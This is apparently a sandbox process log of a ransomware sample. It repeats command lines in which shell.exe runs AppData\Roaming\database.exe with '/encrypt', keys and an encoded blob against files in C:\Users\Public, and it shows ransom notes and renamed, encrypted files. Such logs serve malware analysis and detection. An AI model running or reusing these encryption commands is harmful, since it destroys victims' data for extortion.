C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Videos\Restore-My-Files.txt"5⤵PID:224
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\2720DE842C148E18C1E0270ABEF877C91C879E2B7AB4070B193C1EFF3F1AC1CA"5⤵PID:2104
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6512
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Restore-My-Files.txt"5⤵PID:4320
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\!HELP_SOS.hta"5⤵PID:6264
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\!HELP_SOS.hta.gif.sage"5⤵PID:5160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\Restore-My-Files.txt"5⤵PID:4320
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\Restore-My-Files.txt"5⤵PID:5940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6512
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Restore-My-Files.txt"5⤵PID:6264
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4320
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-XVHTSZBDMOSTVKUWYZBGKMNPSTVXZB.OSE.cbf.gif"5⤵PID:4044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Restore-My-Files.txt"5⤵PID:3060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Sleep Away.mp3.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:224
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Restore-My-Files.txt"5⤵PID:796
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7192
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7228
-
-
